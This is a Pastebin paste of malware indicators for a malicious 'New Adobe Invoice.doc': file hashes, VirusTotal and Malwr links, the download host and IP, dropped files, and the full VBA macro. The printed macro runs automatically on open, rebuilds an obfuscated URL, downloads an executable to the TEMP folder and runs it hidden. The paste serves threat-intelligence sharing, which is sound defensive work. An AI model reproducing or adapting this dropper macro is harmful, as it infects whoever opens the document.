Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- New Adobe Invoice.doc
- MD5: 12a589d6d306f4e888847f127b8ab5ee
- VT: https://www.virustotal.com/en/file/55f06751b22dd5c17bcce7ab9e9da59dcabd3840ab089fe8b800c8aebbf1f3f5/analysis/
- Macro download from url: hxxp://keshmoney[.]su/adobe[.]php
- IP: 94.102.52.186
- https://www.projecthoneypot.org/ip_94.102.52.186
- https://www.virustotal.com/en/ip-address/94.102.52.186/information/
- Dropped: 1.exe
- MD5: f8b521fb58d02915b9748374f653ba70
- VT: https://www.virustotal.com/en/file/ac5ff0806a382593bac3f22ab4038dfbe0a9efaaa39dcd5207ab7917b012a67a/analysis/1412584016/
- @Malwr (Welcome Back): https://malwr.com/analysis/OWI0YzEzNGU0ZWIwNDQxYmJlMWJmOWViZTgyNzRkNzE/
- Dropped files:
- variometer.dll - 6a2ab204068c4eb3b02810384afe58b0
- https://malwr.com/analysis/ZTMyZjE1NjNmZDkxNDZkOThiYTAxMjNkYjgyN2NlZGE/#
- https://www.virustotal.com/en/file/52355804db4fd57c21cb8c79b148616c6cc889685e0e5986b7c050554bfa298d/analysis/1412685680/
- variometer.h - 54884c54da9b136c9a5f6bfab2fad0f7
- https://www.virustotal.com/en/file/5b3d1e4b214cfd34dd69903bb790aab7ec42e6b799f8ed695a3a6a46f1e76b1c/analysis/
- https://malwr.com/analysis/MGQwM2Q2ZWI1MWMxNDc5Njk1N2UxYjEzM2Q5MmQxMTE/
- ~~~~~~~~~~~~~~~MACRO~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Attribute VB_Name = "ThisDocument"
- Attribute VB_Base = "1Normal.ThisDocument"
- Attribute VB_GlobalNameSpace = False
- Attribute VB_Creatable = False
- Attribute VB_PredeclaredId = True
- Attribute VB_Exposed = True
- Attribute VB_TemplateDerived = True
- Attribute VB_Customizable = True
- ByVal GeBiKVj35 As String, _
- ByVal LeMCQnPgP As Long, _
- ByVal SOIrsyJYk As Long) As Long
- Sub SiGa4rtiongi()
- C0rlinge34
- End Sub
- Sub Auto_Open()
- SiGa4rtiongi
- End Sub
- Sub AutoOpen()
- Auto_Open
- End Sub
- Sub G4wringro(asd As String)
- Dim p0tngou3yor As String
- p0tngou3yor = Environ("TEMP")
- Hdfr45iuoyr 0, asd, p0tngou3yor & "\" & "rsrs.exe", 0, 0
- Shell p0tngou3yor & "\" & "rsrs.exe", vbHide
- End Sub
- Sub asdsadadasdasdsadasdasdsadasdasdasdsadasdasdasdasdasdsadasdsasdassad()
- End Sub
- Sub C0rlinge34()
- On Error Resume Next
- Dim sendie45uis As String
- Dim a As String
- Dim aa As String
- Dim jadsadasjdajsdjasdjas As String
- Dim asdjasdjas9ddnasudiasbdiasud As String: Dim asadjasdasdasdasd As String
- sendie45uis = Environ("TEMP")
- Kill sendie45uis & "\rsrs.exe"
- Dim Sgwamyu64 As String
- Sgwamyu64 = "http:" & "//" & "keshm" & "oney" & ".su/" & "ad" & "obe" & ".php"
- Call G4wringro(Replace(Sgwamyu64, " ", ""))
- End Sub
- Sub GLsapqirr()
- SiGa4rtiongi
- End Sub
- Sub FTBgUhEPj()
- SiGa4rtiongi
- End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement